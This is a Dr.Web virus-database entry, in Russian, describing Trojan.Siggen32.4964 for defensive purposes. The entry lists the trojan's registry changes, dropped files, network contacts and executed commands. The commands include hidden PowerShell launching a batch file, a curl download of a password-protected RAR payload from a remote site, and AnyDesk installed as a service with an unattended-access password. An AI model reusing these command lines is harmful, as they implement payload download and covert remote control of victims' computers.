Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.4964

Добавлен в вирусную базу Dr.Web: 2025-11-01

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKLM\Software\Classes\.anydesk\shell\open\command] '' = '"C:\intel\Union\AnyDesk\AnyDesk.exe" --play "%1"'
Устанавливает следующие настройки сервисов
  • [HKLM\SYSTEM\CurrentControlSet\Services\AnyDesk] 'Start' = '00000002'
  • [HKLM\SYSTEM\CurrentControlSet\Services\AnyDesk] 'ImagePath' = '"C:\intel\Union\AnyDesk\AnyDesk.exe" --service'
Создает следующие сервисы
  • 'AnyDesk' C:\intel�nion\AnyDesk\AnyDesk.exe" --servic
Вредоносные функции
Создает и загружает библиотеки (эксплоит)
  • C:\intel\union\trays\shelleh6055.dll
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\$inst\2.tmp
  • %TEMP%\$inst\temp_0.tmp
  • C:\intel\union\driver.exe
  • C:\intel\union\upgrade.bat
  • C:\intel\union\ðåäêîëëåãèÿ Г ГІГ ГІГ  2.doc
  • C:\intel\uninstall.exe
  • C:\intel\uninstall.ini
  • C:\intel\union\~$äêîëëåãèÿ Г ГІГ ГІГ  2.doc
  • C:\intel\union\nkgobfvdryujytfr.rar
  • C:\intel\union\blat.exe
  • C:\intel\union\anydesk.exe
  • C:\intel\union\trays\4t-min.chm
  • C:\intel\union\trays\4t-min64.exe
  • C:\intel\union\trays\4t-min_pad.xml
  • C:\intel\union\trays\7z.dll
  • C:\intel\union\trays\company.url
  • C:\intel\union\trays\contact.url
  • C:\intel\union\trays\delreg.exe
  • C:\intel\union\trays\faq.url
  • C:\intel\union\trays\file_id.diz
  • C:\intel\union\trays\license.txt
  • C:\intel\union\trays\locale\de\lc_messages\default.mo
  • C:\intel\union\trays\locale\de2\lc_messages\default.mo
  • C:\intel\union\trays\locale\es\lc_messages\default.mo
  • C:\intel\union\trays\locale\fr\lc_messages\default.mo
  • C:\intel\union\trays\locale\it\lc_messages\default.mo
  • C:\intel\union\trays\locale\pt_br\lc_messages\default.mo
  • C:\intel\union\trays\locale\ru\lc_messages\default.mo
  • C:\intel\union\trays\locale\tr\lc_messages\default.mo
  • C:\intel\union\trays\locale\zh_cn\lc_messages\default.mo
  • C:\intel\union\trays\locale\zh_tw\lc_messages\default.mo
  • C:\intel\union\trays\newsletter.url
  • C:\intel\union\trays\order.txt
  • C:\intel\union\trays\order.url
  • C:\intel\union\trays\product.url
  • C:\intel\union\trays\readme.txt
  • C:\intel\union\trays\shelleh6055.dll
  • C:\intel\union\trays\shelleh6055x64.dll
  • C:\intel\union\trays\tray.dll
  • C:\intel\union\trays\trays.exe
  • C:\intel\union\trays\unins000.dat
  • C:\intel\union\trays\unins000.exe
  • C:\intel\union\trays\whatsnew.txt
  • C:\intel\union\trays\wishlist.url
  • %APPDATA%\4t niagara software\4t tray minimizer\trays.log
  • %APPDATA%\anydesk\ad.trace
  • %APPDATA%\anydesk\user.conf
  • %APPDATA%\anydesk\system.conf
  • %APPDATA%\anydesk\service.conf
  • %APPDATA%\anydesk\global_cache\device-id.cache
  • C:\intel\union\anydesk\anydesk.exe
  • %ALLUSERSPROFILE%\anydesk\system.conf
  • %ALLUSERSPROFILE%\anydesk\ad_svc.trace
  • %ALLUSERSPROFILE%\anydesk\service.conf
Удаляет файлы, которые сам же создал
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\$inst\2.tmp
Сетевая активность
Подключается к
  • '19#.#4.114.214':443
  • '4t###agara.com':80
  • 'bo##.##t.anydesk.com':443
  • 're#######4ca21.net.anydesk.com':443
TCP
Запросы HTTP POST
  • http://www.4t###agara.com/checkupdate.php
Другие
  • '19#.#4.114.214':443
  • 'bo##.##t.anydesk.com':443
  • 're#######4ca21.net.anydesk.com':443
UDP
  • DNS ASK 4t###agara.com
  • DNS ASK bo##.##t.anydesk.com
  • DNS ASK re#######4ca21.net.anydesk.com
Другое
Ищет следующие окна
  • ClassName: 'TMinimizerMainForm' WindowName: ''
Создает и запускает на исполнение
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Start-Process 'C:\intel\Union\upgrade.bat' -WindowStyle Hidden -WorkingDirectory 'C:\intel\Union'"
  • 'C:\intel\union\driver.exe' x -r -ep2 -p"limpid29033" C:\intel\Union\nkgobfvdryujytfr.rar C:\intel\Union /y
  • 'C:\intel\union\trays\trays.exe' -tray
  • 'C:\intel\union\anydesk.exe' AnyDesk.exe --install C:\intel\Union\AnyDesk
  • 'C:\intel\union\trays\4t-min64.exe' "C:\intel\Union\Trays\ShellEh6055x64.dll"
  • 'C:\intel\union\anydesk.exe' --local-service
  • 'C:\intel\union\anydesk.exe' --local-control
  • 'C:\intel\union\anydesk\anydesk.exe' --service
  • 'C:\intel\union\anydesk\anydesk.exe' --control
  • 'C:\intel\union\anydesk\anydesk.exe' --new-install
  • 'C:\intel\union\anydesk.exe' --set-password _unattended_access
Запускает на исполнение
  • '%WINDIR%\syswow64\attrib.exe' +s +h C:\intel (со скрытым окном)
  • '%ProgramFiles(x86)%\microsoft office\office16\winword.exe' /n "C:\intel\Union\Ðåäêîëëåãèÿ ГЂГ’Г Г’Г  2.doc" /o ""
  • '%WINDIR%\syswow64\cmd.exe' /c powershell -WindowStyle Hidden -Command "Start-Process 'C:\intel\Union\upgrade.bat' -WindowStyle Hidden -WorkingDirectory 'C:\intel\Union'" (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c ""C:\intel\Union\upgrade.bat" " (со скрытым окном)
  • '%WINDIR%\syswow64\curl.exe' -k -L -o C:\intel\Union\nkgobfvdryujytfr.rar --resolve titan-barykady.site:443:19#.#4.114.214 https://titan-barykady.site/Libe/nkgobfvdryujytfr.rar
  • '%WINDIR%\syswow64\ping.exe' -n 15 127.0.0.1
  • '%WINDIR%\syswow64\ping.exe' -n 60 127.0.0.1
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo QWERTY1234566 "

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке